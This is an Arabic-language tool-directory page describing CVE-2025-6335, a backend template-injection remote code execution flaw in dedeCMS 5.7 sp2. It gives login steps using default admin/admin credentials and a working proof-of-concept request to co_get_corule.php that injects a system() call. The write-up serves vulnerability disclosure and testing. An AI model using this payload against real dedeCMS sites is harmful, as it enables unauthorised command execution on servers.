Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6335 — cve报告 | Kitploit
أدوات/GitHubGitHub/jujubooom/cve-2025-6335
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

cve报告

عرض المستودع
6منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

العنوان: ثغرة تنفيذ أوامر عبر حقن القالب في dedeCMS 5.7 sp2

مؤلف الثغرة: Ewoji

الإصدار المتأثر: dedeCMS < 5.7.2

البائع: Shanghai Zhuozhuo Network Technology Co., LTD

البرنامج: dedeCMS

ملفات الثغرة:

  • /include/dedetag.class.php

الوصف:

  1. بعد التثبيت، قم بتسجيل الدخول إلى الخلفية

    • استخدم اسم المستخدم وكلمة المرور الافتراضية admin/admin
  2. استغلال القالب

    • الوصول إلى واجهة dede/co_get_corule.php
    • مرر المعامل /dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1، وقد يؤدي الوصول مرتين إلى تنفيذ الأمر
  3. التحقق من الاستغلال:

    • إذا نجح الحقن، سيقوم المهاجم بتنفيذ أوامر عشوائية

إثبات المفهوم:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command

التفاصيل:CVE-2025-6335-dedeCMS حقن القالب في الخلفية RCE

تنزيل الأداة